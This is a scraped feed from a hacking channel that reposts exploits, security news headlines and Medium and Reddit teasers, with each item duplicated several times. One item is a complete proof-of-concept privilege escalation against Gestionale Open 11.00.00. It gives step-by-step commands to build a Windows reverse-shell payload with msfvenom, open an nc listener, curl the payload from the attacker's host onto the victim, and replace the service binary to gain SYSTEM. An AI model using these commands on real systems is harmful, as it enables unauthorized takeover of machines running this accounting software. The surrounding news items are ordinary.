Exploit Collector
FreeSWITCH 1.10.5 SIP SUBSCRIBE Missing Authentication
___________________________
@hacking_Attack
@Hacking_Video
FreeSWITCH 1.10.5 SIP SUBSCRIBE Missing Authentication
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
FreeSWITCH 1.10.5 SIP SUBSCRIBE Missing Authentication
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Gestionale Open 11.00.00 Privilege Escalation
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
Gestionale Open version 11.00.00 suffers from a local privilege escalation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Gestionale Open 11.00.00 Privilege Escalation
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
Gestionale Open version 11.00.00 suffers from a local privilege escalation vulnerability.
MD5 |
434cabbe8d061a0f0132600775b3babfDownload
# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Homepage: https://www.gestionaleopen.org/
# Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
# Version: 11.00.00
# Tested on: Microsoft Windows 10 Enterprise x64
With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.
Vendor: Gestionale Open srl.
Affected version: > 11.00.00
# Details
# By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
The application also have unquoted service path issues.
(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:
C:\Gestionale_Open\MySQL57\bin\mysqld.exe
Details:
SERVICE_NAME: DB_GO
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DB_GO
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
(2) Folder permissions.
Insecure folders permissions issue:
C:\Gestionale_Open Everyone:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start
3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"
4. Overwrite file and copy malicious .exe.
Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Gestionale Open 11.00.00 Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Dark Reading: Attacks/Breaches
Industrial Goods & Services Tops Ransomware Targets in 2021
While the industrial goods and services sector saw a decline in attacks during the third quarter, it remains the most targeted sector for ransomware this year.
___________________________
@hacking_Attack
@Hacking_Video
Industrial Goods & Services Tops Ransomware Targets in 2021
While the industrial goods and services sector saw a decline in attacks during the third quarter, it remains the most targeted sector for ransomware this year.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Industrial Goods & Services Tops Ransomware Targets in 2021
While the industrial goods and services sector saw a decline in attacks during the third quarter, it remains the most targeted sector for ransomware this year.
Leveraging Reflected XSS
https://thexssrat.medium.com/leveraging-reflected-xss-8125cb010988?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://thexssrat.medium.com/leveraging-reflected-xss-8125cb010988?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Leveraging Reflected XSS
Introduction
IntroductionContinue reading on Medium » (https://thexssrat.medium.com/leveraging-reflected-xss-8125cb010988?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Leveraging Reflected XSS
Introduction
hacking: security in practice
Microsoft Says Russia Hacked at Least 14 IT Service Providers this Year
https://a.thumbs.redditmedia.com/d4hzWJSQkgApWutPorVwq-FOiWgxj8xSkPDVIkzuQs0.jpg submitted by /u/eis3nheim
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Microsoft Says Russia Hacked at Least 14 IT Service Providers this Year
https://a.thumbs.redditmedia.com/d4hzWJSQkgApWutPorVwq-FOiWgxj8xSkPDVIkzuQs0.jpg submitted by /u/eis3nheim
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Microsoft Says Russia Hacked at Least 14 IT Service Providers this...
Posted in r/hacking by u/eis3nheim • 131 points and 4 comments
hacking: security in practice
I hacked the installer for Heroes of Might and Magic V: Hammers of Fate so that it works, after Ubisoft Connect buggered it up.
submitted by /u/MokausiLietuviu
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
I hacked the installer for Heroes of Might and Magic V: Hammers of Fate so that it works, after Ubisoft Connect buggered it up.
submitted by /u/MokausiLietuviu
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
I hacked the installer for Heroes of Might and Magic V: Hammers of...
Posted in r/hacking by u/MokausiLietuviu • 1 point and 1 comment
hacking: security in practice
Is there any way to make it harder for criminals and other countries to launch cyberattacks
There are constant attacks from countries like Russia and it seems very annoying that they're trying to access secrets. Is there any way to foil any hacking attempts? I've only began my computer science and I still have a lot to learn, but what is the overview in regards to deterring security weaknesses?
submitted by /u/Starfox_2020
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Is there any way to make it harder for criminals and other countries to launch cyberattacks
There are constant attacks from countries like Russia and it seems very annoying that they're trying to access secrets. Is there any way to foil any hacking attempts? I've only began my computer science and I still have a lot to learn, but what is the overview in regards to deterring security weaknesses?
submitted by /u/Starfox_2020
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is there any way to make it harder for criminals and other...
There are constant attacks from countries like Russia and it seems very annoying that they're trying to access secrets. Is there any way to foil...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Microsoft advierte sobre continuos ataques a la cadena de suministro por parte del Nobelium Hacker…
https://cdn-images-1.medium.com/max/1250/0*B1lcshItp9Jvotm-
PUBLICADO EN 25 OCTUBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Microsoft advierte sobre continuos ataques a la cadena de suministro por parte del Nobelium Hacker…
https://cdn-images-1.medium.com/max/1250/0*B1lcshItp9Jvotm-
PUBLICADO EN 25 OCTUBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Microsoft advierte sobre continuos ataques a la cadena de suministro por parte del Nobelium Hacker Group
PUBLICADO EN 25 OCTUBRE, 2021 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hack This Site: Javascript Mission — Level 6
https://cdn-images-1.medium.com/max/2000/0*Sxv3ys3fJsm0fKok
Hello friends and welcome to HaXeZ, today we’re going to solve Javascript Mission 6 on Hack This Site. This challenge isn’t too difficult…
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Hack This Site: Javascript Mission — Level 6
https://cdn-images-1.medium.com/max/2000/0*Sxv3ys3fJsm0fKok
Hello friends and welcome to HaXeZ, today we’re going to solve Javascript Mission 6 on Hack This Site. This challenge isn’t too difficult…
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hack This Site: Javascript Mission — Level 6
Hello friends and welcome to HaXeZ, today we’re going to solve Javascript Mission 6 on Hack This Site. This challenge isn’t too difficult…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Crack OSCP with 100 points in second attempt!
https://cdn-images-1.medium.com/max/1397/1*IKnm8PN9XyVmAEcfaKsY3g.jpeg
Hi everyone, I am happy to share that recently I passed my OSCP exam in my second attempt, 4 weeks after my first attempt. Look back my…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Crack OSCP with 100 points in second attempt!
https://cdn-images-1.medium.com/max/1397/1*IKnm8PN9XyVmAEcfaKsY3g.jpeg
Hi everyone, I am happy to share that recently I passed my OSCP exam in my second attempt, 4 weeks after my first attempt. Look back my…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Crack OSCP with 100 points in second attempt!
Hi everyone, I am happy to share that recently I passed my OSCP exam in my second attempt, 4 weeks after my first attempt. Look back my…